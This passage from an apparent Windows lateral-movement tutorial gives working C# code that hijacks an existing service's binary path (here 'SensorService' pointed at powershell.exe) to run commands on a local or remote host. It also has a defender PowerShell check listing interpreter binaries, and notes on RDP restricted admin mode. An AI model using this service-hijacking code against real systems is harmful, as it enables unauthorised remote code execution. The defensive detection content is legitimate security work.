We can do this in C# in a slightly more elegant way, without having to copy a file and register a new service (instead we briefly change the binary path of an existing one).
```csharp
using System;
using System.Runtime.InteropServices;

namespace NetPsExec
{
    class Program
    {
        [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)]
        public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwAccess);

        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess);

        [DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfig")]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool ChangeServiceConfigA(IntPtr hService, uint dwServiceType, int dwStartType, int dwErrorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword, string lpDisplayName);

        [DllImport("advapi32", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool StartService(IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors);

        static void Main(string[] args)
        {
            String target = "localhost"; // can be a remote computer name
            IntPtr SCMHandle = OpenSCManager(target, null, 0xF003F); // SC_MANAGER_ALL_ACCESS

            string ServiceName = "SensorService"; // can be any service that is not in use and that we can start
            IntPtr schService = OpenService(SCMHandle, ServiceName, 0xF01FF); // SERVICE_ALL_ACCESS

            // Point the existing service at the payload: 0xffffffff = SERVICE_NO_CHANGE (keep service type),
            // 3 = SERVICE_DEMAND_START, 0 = SERVICE_ERROR_IGNORE; all other fields are left unchanged (null).
            string payload = "powershell.exe";
            bool bResult = ChangeServiceConfigA(schService, 0xffffffff, 3, 0, payload, null, null, null, null, null, null);

            bResult = StartService(schService, 0, null);
        }
    }
}
```
A more advanced implementation can be found in SCShell, which even has a Python version and does some additional steps (like restoring the original path).
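From the defender's side, the trace this technique leaves is a service whose binary path now points at a shell or script host. The following PowerShell check is an added example, not code from the original page or from SCShell; it assumes an elevated session on the host being audited, and the interpreter list and the baseline file location are this example's own choices.

```powershell
# Added defender-side check, not part of the original page or of SCShell.
# Assumes an elevated PowerShell session on the host being audited; the
# interpreter list and the baseline path below are this example's own choices.
$Interpreters = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe',
                  'cscript.exe', 'mshta.exe', 'rundll32.exe', 'regsvr32.exe')
$BaselineFile = 'C:\ProgramData\service-imagepath-baseline.json'   # assumed location

function Get-ServiceExeName {
    # Reduce an ImagePath such as '"C:\Program Files\x\svc.exe" -arg' or
    # '%SystemRoot%\system32\svchost.exe -k netsvcs' to its executable name.
    param([string]$ImagePath)
    if ($ImagePath -match '^"([^"]+)"') { $exePath = $Matches[1] }
    else { $exePath = ($ImagePath.Trim() -split '\s+')[0] }
    return (($exePath -split '[\\/]')[-1]).ToLowerInvariant()
}

# Current ImagePath of every service, read from the registry the SCM itself uses.
$current = @{}
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
    $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    if ($props -and $props.ImagePath) { $current[$_.PSChildName] = [string]$props.ImagePath }
}

# Check 1: a service whose binary is a bare shell or script host is what the
# ChangeServiceConfig trick above leaves behind until the path is restored.
foreach ($name in $current.Keys) {
    if ($Interpreters -contains (Get-ServiceExeName $current[$name])) {
        Write-Warning "Service '$name' runs an interpreter: $($current[$name])"
    }
}

# Check 2: diff against the last saved baseline, then save the current state.
if (Test-Path $BaselineFile) {
    $baseline = Get-Content $BaselineFile -Raw | ConvertFrom-Json
    foreach ($name in $current.Keys) {
        $old = $baseline.$name
        if ($null -ne $old -and $old -ne $current[$name]) {
            Write-Warning "ImagePath of '$name' changed: '$old' -> '$($current[$name])'"
        }
    }
}
$current | ConvertTo-Json | Set-Content -Path $BaselineFile
```

Both checks only see a path that is still altered at scan time; a tool that restores the original path, as SCShell does, leaves nothing here to find, so a point-in-time scan should be paired with service change and start logging.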
RDP
This is probably the easiest and most comfortable way. On Linux use xfreerdp for CredSSP.
On Windows we use mstsc.exe. When supplied the /restrictedadmin parameter, the current user's authentication will be used without having to enter any credentials (a network logon, which does not cache credentials). When supplying credentials, these will always be cached by Windows, even after the RDP session has ended. Restricted admin mode is disabled by default though (controlled by HKLM:\System\CurrentControlSet\Control\Lsa).